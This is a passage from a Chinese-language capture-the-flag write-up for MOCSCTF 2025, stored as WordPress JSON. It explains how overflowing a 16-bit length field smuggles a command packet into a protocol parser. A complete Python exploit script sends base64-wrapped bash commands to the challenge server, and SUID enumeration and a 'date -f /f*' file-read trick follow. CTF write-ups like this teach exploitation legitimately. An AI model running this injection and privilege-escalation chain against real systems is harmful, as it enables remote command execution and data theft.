\u4f46\u8fd9\u91cc\u6709\u4e00\u4e2a\u5f88\u6709\u8da3\u7684\u70b9\uff0c\u56e0\u4e3a\u53d1\u9001\u7684\u957f\u5ea6\u5b57\u6bb5\u662f\u76f4\u63a5len\u7684\u8f7d\u8377\uff0c\u867d\u7136\u6211\u4eec\u7684\u547d\u4ee4\u4e0d\u7b26\u5408\u65e5\u671f\u53ef\u80fd\u4e0d\u80fd\u76f4\u63a5\u6267\u884c\uff0c\u4f46\u6211\u4eec\u73b0\u5728\u786e\u5b9e\u80fd\u76f4\u63a5\u63a7\u5236\u957f\u5ea6\u5b57\u6bb5\u7684\u957f\u5ea6\u3002\u6211\u4eec\u56de\u770b\u8fd9\u4e2a\u534f\u8bae\uff0c\u8fd9\u4e2a pack('n', strlen($command))<\/code> \u662f\u4ec0\u4e48\u610f\u601d\u5462\uff1f\u5176\u5b9e\u662f\u83b7\u53d6$command<\/code> \u8fd9\u6bb5\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u63a5\u7740\u6309\u716716\u4f4d\uff082\u5b57\u8282\uff09\u65e0\u7b26\u53f7\u6574\u6570\u6253\u5305\u6210\u4e8c\u8fdb\u5236\u6570\u636e\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
16\u4f4d\u4e5f\u5c31\u662f\u6211\u4eec\u4e4b\u524d\u770b\u5230\u7684000a\uff0c\u800c16\u4f4d\u65e0\u7b26\u53f7\u6574\u6570\u5176\u5b9e\u6709\u4e0a\u9650\u7684\uff0c\u5b83\u7684\u4e0a\u9650\u5c31\u662fffff\uff0c\u5982\u679c\u6211\u4eec\u518d\u7ed9\u5b83\u52a01\uff0c\u5b83\u5c31\u4f1a\u53d8\u621010000\uff0c\u800c\u7ecf\u8fc716\u4f4d\u7684\u622a\u65ad\uff0c\u5b9e\u9645\u4e0a\u5199\u5165\u534f\u8bae\u7684\u957f\u5ea6\u5c31\u53d8\u6210\u4e860000\u3002\u6211\u4eec\u4e0d\u59a8\u505a\u4e2a\u5b9e\u9a8c\uff0c16\u4f4d\u65e0\u7b26\u53f7\u6574\u6570\u7684\u6700\u5927\u503c\u662f65536\uff0c\u800c\u672c\u6765\u7684\u8f7d\u83772012-12-11\u7684\u957f\u5ea6\u662f10\uff0c\u7406\u8bba\u4e0a\u6211\u4eec\u53ea\u8981\u518d\u57282012-12-11\u7684\u540e\u9762\u52a065526\u4e2aA\uff0c\u90a3\u4e48\u73b0\u5728\u5199\u5165\u534f\u8bae\u7684\u957f\u5ea6\u5b57\u6bb5\u5c31\u5e94\u8be5\u53d8\u62100000\uff0c\u800c\u4e8b\u5b9e\u4e5f\u6b63\u5982\u6211\u4eec\u6240\u613f\uff0c\u5b83\u53d8\u6210\u4e860000\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5c24\u91cc\u5361\uff01\u73b0\u5728\u6211\u4eec\u5df2\u7ecf\u80fd\u4efb\u610f\u63a7\u5236\u8fd9\u4e2a\u957f\u5ea6\u5b57\u6bb5\u4e86\uff0c\u6211\u4eec\u518d\u56de\u770b\u540e\u7aef\u89e3\u6790\u534f\u8bae\u7684\u903b\u8f91\uff0c\u5b83\u5176\u5b9e\u5c31\u662f\u6839\u636e\u8fd9\u4e2a\u957f\u5ea6\u5b57\u6bb5\u89e3\u6790\u8f7d\u8377\uff0c\u7136\u540e\u7ee7\u7eed\u6309\u7740\u7c7b\u4f3c\u7684\u903b\u8f91\u89e3\u6790\u4e0b\u4e00\u4e2a\u4e8c\u8fdb\u5236\u534f\u8bae\uff0c\u76f4\u5230\u6574\u4e2a\u8bf7\u6c42\u89e3\u6790\u7ed3\u675f\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u90a3\u4e48\u601d\u8def\u5176\u5b9e\u5df2\u7ecf\u5f88\u660e\u663e\u4e86\uff0c\u56e0\u4e3a\u53ea\u6709\u6807\u5934\u4e3aA\u7684\u4e8c\u8fdb\u5236\u534f\u8bae\u624d\u80fd\u6b63\u5e38\u6267\u884c\uff0c\u90a3\u4e48\u6211\u4eec\u53ea\u9700\u8981\u6784\u9020\u4e00\u4e2a\u6807\u5934\u4e3aA\u7684\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u4e8c\u8fdb\u5236\u534f\u8bae\uff0c\u5c06\u4ed6\u653e\u57282012-12-11\u7684\u540e\u9762\uff0c\u7136\u540e\u586b\u5145A\uff0c\u4fdd\u8bc1\u7b2c\u4e00\u4e2a\u534f\u8bae\u622a\u65ad\u540e\u6070\u597d\u662f\u4e00\u4e2a\u5408\u6cd5\u7684\u4ee5A\u5f00\u5934\u7684\u534f\u8bae\uff0c\u90a3\u4e48\u5c31\u4f1a\u6210\u529f\u89e3\u6790\u6211\u4eec\u7684\u534f\u8bae\u5e76\u4e14\u6267\u884c\u4efb\u610f\u547d\u4ee4\u4e86\uff01\u811a\u672c\u5982\u4e0b\uff1a<\/p>\n\n\n\n
import http.client\nimport struct\nimport gzip\nimport io\nimport base64\n\n\n# \u6784\u9020\u5934\u90e8\u7528\u5230\u7684\u7b7e\u540d\nx_signature = \"@@@\"\n\n\ndef build_packet(command: str) -> str:\n    prefix = b\"A\"\n    length = struct.pack(\">H\", len(command))\n    payload = command.encode()\n    full_packet = prefix + length + payload\n    return full_packet.hex()\n\n\n# command2execute = \"find \/ -perm -u=s -type f 2>\/dev\/null\"\n# command2execute = \"date -f \/f* 2>&1\"\n# command2execute = \"cat \/f* 2>&1\"\ncommand2execute = \"ls -al \/\"\n\ncommand = (\n    \"bash -c '{echo,\"\n    + base64.b64encode(command2execute.encode()).decode()\n    + \"}|{base64,-d}|{bash,-i}'\"\n)\nHexCommand = build_packet(command)\n# print(HexCommand)\n\nhex_part = bytes.fromhex(HexCommand)\nprefix = \"function=B&date=2012-12-11\"\nprefix_bytes = prefix.encode()\n\ntotal_length = 65536\n\nfiller_len = total_length - len(hex_part)\n\n# \u6784\u9020\u8bf7\u6c42\u4f53\uff1a\u524d\u7f00 + \u534f\u8bae\u5305 + \u586b\u5145\nbody = prefix_bytes + hex_part + b\"A\" * filler_len\n\n# target_url = \"localhost:9999\"\ntarget_url = \"public-chall-2025.mocsctf.com:31001\"\n\n# \u6784\u9020 headers\nheaders = {\n    \"Host\": target_url,\n    \"X-Signature\": x_signature,\n    \"User-Agent\": \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko\/20100101 Firefox\/137.0\",\n    \"Accept\": \"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\",\n    \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n    \"Accept-Encoding\": \"gzip, deflate, br\",\n    \"Content-Type\": \"application\/x-www-form-urlencoded\",\n    \"Origin\": target_url,\n    \"Referer\": target_url,\n    \"Upgrade-Insecure-Requests\": \"1\",\n    \"Sec-Fetch-Dest\": \"document\",\n    \"Sec-Fetch-Mode\": \"navigate\",\n    \"Sec-Fetch-Site\": \"same-origin\",\n    \"Sec-Fetch-User\": \"?1\",\n    \"Priority\": \"u=0, i\",\n    \"Connection\": \"close\",\n    \"Content-Length\": str(len(body)),\n}\n\n# \u53d1\u8d77\u8bf7\u6c42\nconn = http.client.HTTPConnection(target_url)\nconn.request(\"POST\", \"\/\", body=body, headers=headers)\n\n# \u8bfb\u53d6\u54cd\u5e94\nres = conn.getresponse()\nprint(f\"Status: {res.status}\")\n# print(res.read().decode(errors=\"ignore\"))\nraw_data = res.read()\ntry:\n    with gzip.GzipFile(fileobj=io.BytesIO(raw_data)) as f:\n        decompressed_data = f.read()\n    text = decompressed_data.decode(\"utf-8\", errors=\"ignore\")\n    print(text)\nexcept Exception as e:\n    print(f\"\u89e3\u538b\u5931\u8d25: {e}\")\n    print(raw_data)\n<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u6211\u4eec\u76f4\u63a5\u6267\u884cls -al \/\uff0c\u53ef\u4ee5\u53d1\u73b0\u6211\u4eec\u73b0\u5728\u6ca1\u6709\u8bfb\u53d6flag\u7684\u6743\u9650\uff0c\u8fd8\u9700\u8981\u63d0\u4e00\u4e0b\u6743\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fd9\u91cc\u6211\u4eec\u7528find \/ -perm -u=s -type f 2>\/dev\/null<\/code>\u67e5\u4e00\u4e0bsuid\uff0c\u53ef\u4ee5\u53d1\u73b0date\u5b58\u5728suid\u63d0\u6743\u7684\u53ef\u80fd\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4e0d\u8fc7\u8fd9\u91cc\u6211\u4eec\u5982\u679c\u76f4\u63a5\u4f7f\u7528date -f \/f*<\/code>\u5728\u9875\u9762\u4e0a\u5176\u5b9e\u662f\u770b\u4e0d\u5230\u8f93\u51fa\u7684\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u56de\u770b\u7f51\u9875\u4ee3\u7801\u91cc\u6267\u884c\u4ee3\u7801\u7684\u903b\u8f91\uff0c\u5b83\u5176\u5b9e\u662f\u8bfb\u53d6\u4e86\u7f13\u51b2\u533a\u7684\u7ed3\u679c\u8fdb\u884c\u8f93\u51fa\uff0c\u9519\u8bef\u4fe1\u606f(\u6211\u4eec\u7684date -f<\/code>\u6267\u884c\u5f97\u5230\u7684\u5c31\u662f\u9519\u8bef\u4fe1\u606f)\u901a\u5e38\u4f1a\u8f93\u51fa\u5230\u6807\u51c6\u9519\u8bef\u6d41\uff08stderr<\/code>\uff09\u4e2d\uff0c\u800c\u4e0d\u4f1a\u5199\u5165\u5230\u6807\u51c6\u8f93\u51fa\u6d41\uff08stdout<\/code>\uff09\u4e2d\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u56e0\u6b64\u8981\u60f3\u5728\u9875\u9762\u4e0a\u770b\u5230\u8f93\u51fa\uff0c\u6211\u4eec\u9700\u8981\u628a\u9519\u8bef\u4fe1\u606f\u4e5f\u8f93\u51fa\u5230\u7f13\u51b2\u533a\uff0c\u6700\u540e\u80fd\u6253\u901a\u7684payload\u5176\u5b9e\u662fdate -f \/f* 2>&1<\/code>\uff0c\u4e0d\u8fc7\u518d\u4f20POST\u7684\u65f6\u5019\u8fd8\u9700\u8981\u5bf9&\u7279\u6b8a\u5904\u7406\u4e00\u4e0b\uff0c\u5426\u5219\u89e3\u6790\u4f1a\u51fa\u9519\uff0c\u6bd4\u5982\u6211\u7684exp.py\u91cc\u662f\u76f4\u63a5base64\u4e86\uff0c\u6700\u540e\u6211\u4eec\u7ec8\u4e8e\u53ef\u4ee5\u8bfb\u53d6flag\u4e86\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u56de\u770b\u6574\u9898\u53ef\u4ee5\u53d1\u73b0\uff0c\u51fa\u73b0\u6f0f\u6d1e\u7684\u539f\u56e0\u5176\u5b9e\u548c\u7f16\u7a0b\u8bed\u8a00\u6ca1\u6709\u5173\u7cfb\uff0c\u7eaf\u7cb9\u662f\u56e0\u4e3a\u4ee3\u7801\u7684\u903b\u8f91\u9519\u8bef\u3002\u4e8b\u5b9e\u4e5f\u786e\u5b9e\u5982\u6b64\uff0c\u9a8c\u7b7e\u90a3\u4e2a\u6f0f\u6d1e\u672c\u6765\u662f\u51fa\u5728js\u4e0a\u7684\uff0c\u534f\u8bae\u6ce8\u5165\u662f\u51fa\u5728go\u4e0a\uff0c\u800cgo\u6ca1\u6709try catch\u8fd9\u79cd\u8bed\u6cd5\uff0c\u6240\u4ee5\u6700\u540e\u53ea\u80fd\u9009\u62e9\u4e16\u754c\u4e0a\u6700\u597d\u7684\u8bed\u8a00php\u51fa\u9898\u4e86\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6bd4\u8d5b\u94fe\u63a5\uff1ahttps:\/\/mocsctf.com\/events.html?id=mocsctf-2025 \u8fd9\u6b21 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-3905","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3905","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=3905"}],"version-history":[{"count":3,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3905\/revisions"}],"predecessor-version":[{"id":4022,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3905\/revisions\/4022"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=3905"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=3905"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=3905"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}